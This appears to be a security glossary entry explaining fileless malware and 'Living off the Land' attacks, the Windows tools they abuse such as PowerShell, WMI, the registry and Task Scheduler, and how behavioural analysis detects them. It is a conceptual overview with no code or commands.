Bodiless or fileless malware is malware that is not stored on the hard drive as an executable file, but is loaded directly into memory. This type of malware is dangerous because it leaves practically no trace within the infected system, making it quite difficult to detect.
As a rule, fileless malware uses capabilities belonging to legitimate programs and operating system components in order to run itself and persist in the system. For example, a malicious script can be passed to the computer as a command line parameter. Attacks that use legitimate software installed on the infected device are called Living off the Land or LotL attacks.
How a fileless attack occurs
There are various techniques attackers can use to avoid having to save files to the disk at different stages of an attack.
- System penetration. At this stage, attackers can remotely exploit vulnerabilities in programs installed on the target device, inject malicious code into the firmware, or run the code from an external drive, such as a USB flash drive.
- Establishment of persistence. At this stage, attackers use legitimate system tools to launch the fileless malware if it stops running for some reason — for example, if the user reboots the computer. For instance, on Windows devices attackers can add a malicious entry to the Windows registry or create a task in the Task Scheduler so that the malware runs whenever certain conditions are met — such as when the device is turned on.
- Execution of the malicious code. To execute the malicious code, legitimate system tools are also used.
Legitimate tools in fileless attacks
Legitimate tools frequently used in fileless attacks include:
- WMI (Windows Management Instrumentation) — an interface that company administrators use to access data needed to manage devices on a corporate network. Attackers use WMI to establish persistence in the system, bypass security, steal data, move laterally across the network, and other malicious purposes.
- PowerShell — a scripting shell intended for device administration. Attackers use PowerShell to launch fileless malware.
- .NET Framework — a cross-platform application development framework that also powers PowerShell. Attackers use the features of .NET to launch fileless malware and remove artifacts from memory.
- Windows registry — a database that holds settings for programs, user profiles, connected devices, etc. In particular, attackers use the registry to establish fileless malware persistence in the system.
- Windows Task Scheduler — a Windows feature for configuring the automatic execution of certain tasks, such as launching a program at a specific time. Attackers can create a task to execute fileless malware, and the system itself will run it.
Use of files in fileless malware attacks
Fileless attacks are not always completely fileless. Files are often saved to the disk at some point in the attack, such as documents with macros that load fileless malware into the memory. Once it has executed its function, the malicious file is usually deleted from the infected device.
Fileless threat detection
Fileless attacks are difficult to detect using signature analysis. To detect bodiless malware activity, modern security systems use behavioral analysis methods as well as additional checks of critical elements, such as the registry, Task Scheduler, and the PowerShell environment.